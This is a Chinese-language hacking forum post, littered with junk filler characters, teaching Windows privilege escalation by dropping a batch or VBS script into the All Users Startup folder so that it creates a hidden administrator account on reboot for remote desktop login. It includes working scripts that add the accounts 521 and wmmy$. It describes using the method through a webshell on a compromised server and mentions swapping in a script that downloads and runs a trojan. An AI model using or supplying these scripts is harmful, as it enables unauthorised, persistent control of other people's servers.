- 帖子
- 575
- 积分
- 1897
- 威望
- 2479
- 金钱
- 15914
- 在线时间
- 175 小时
|
大家好,我是完美蚂蚁 今天给大家带来的提权教程是
& m( K5 l7 d3 D启动 提权
/ _' d1 k7 b# @7 @C:\Docume~1\All Users\「开始」菜单\程序\启动
$ m, K+ V# X, j' C在这里必须有写入权限 否则此方法无效+ R9 P& b% G1 a+ y) ]9 q
因为我是在网吧 这里显示不了路径5 D8 p% T7 Z: H: ~. _* C
我去服务器上演示给大家看; F) S- X, Z& K4 w4 A, ? W+ F; f
大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的
\0 G6 g, ^# _6 i5 S文件 从而运行我们的文件
* ~% M+ \% ~# `( q这里有两中方式 第一种是批处理
! }0 L" I" ?; x+ a, h& T5 h- {7 n1 {我们来看下目前 我机器上的用户组 e5 E6 g; F( d: u1 u0 N
目前我们没有521这个用户
' Z; }' X$ T2 W" E( K- }. N7 N+ ~看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示
4 b, z) L8 T! @+ A& l# G大家看到了吧 如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现' W4 P" n3 q2 X
下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的
) z, m$ d" u; r4 w6 w8 ~# a大家看 已经成功加入了WMMY用户; a5 _5 G4 R8 G. N/ j
网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了+ l* A# ?: ?/ {1 ?$ a
当前终端服务端口: 3389
' \ i, {0 m$ w9 b" w" n系统自动登录功能未开启9 @3 j+ W/ M2 h, z
3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了
, [- ?3 z7 `+ O/ f6 XC:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径
2 |, k& c/ V2 M9 t W6 I第一种隐蔽性太差 我们就用第二种吧
# F U4 B2 \; D已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去# D. h# a6 P& L" a# z5 D% c
从而取得了3389的登陆权限
. ?: \# A0 m8 H1 E4 d其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马
* O- A8 V- m# h+ e" X基本原理都差不多 我就不多介绍了
* r/ s$ I1 `. j# X7 @/ U C1 ~教程结束```* P' v2 K: ~2 N) U9 [- @0 \
@echo off8 n" f7 Q, b( v0 @5 a( q' G2 J$ A
net user 521 521 /add
& X' ]. q" w2 s8 \net localgroup administrators 521 /add4 V3 @7 k5 H8 E! i/ C
* `4 k6 E+ x% X
on Error Resume next
8 x o+ ^# D2 D! Lset wshshell=createobject("wscript.shell")9 g5 I% Q9 Y2 n! y. [# Y* I2 u
a=wshshell.run("net user wmmy$ 1227 /add",0)8 Q4 p% e( n7 S0 n
a=wshshell.run("net localgroup administrators wmmy$ /add",0)
2 t! j* j5 p u. ?. \% P# Y- A/ @! B. |' e S& x6 \ [& N1 V
0 k" N0 L' U: t2 W
点击下载5 k* \+ F: T) W* d
|
-
2
评分人数
-
|